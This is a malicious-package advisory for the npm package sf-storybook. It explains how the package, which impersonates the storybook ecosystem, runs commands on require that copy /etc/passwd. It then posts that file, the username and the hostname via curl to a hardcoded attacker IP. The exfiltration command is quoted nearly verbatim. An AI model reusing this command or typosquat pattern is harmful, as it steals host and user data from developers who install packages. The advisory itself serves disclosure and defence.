VYPR

npm · Malicious package advisory

Malware

sf-storybook

MAL-2026-6261

Malicious code in sf-storybook (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a5a1a34bbf1dc84732509c5c5bfbd65adcd442b2665367d0c1bd39dc8301001c)
On `require('sf-storybook')`, index.js shells out via child_process to run `cat /etc/passwd >./passwd.txt` and then POSTs the file contents via curl to `http://144.126.158.177:4325/$(whoami)/$(hostname)/` over plaintext HTTP. The package leaks the installer's username, hostname, and full /etc/passwd contents to a hardcoded bare-IP attacker endpoint. The package name impersonates the `storybook` ecosystem, ships empty author/description metadata, and contains only this exfiltration payload with no functionality matching its implied purpose — a typosquat lure with an embedded credential/host recon stealer.

## Source: ossf-package-analysis (961d26175eb7b4d34d87e6cb162f4b9d5a9febcb520b24a4512406d492a829b5)
The OpenSSF Package Analysis project identified 'sf-storybook' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

- The package executes one or more commands associated with malicious behavior.

Compromised versions (1)

  • 1.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.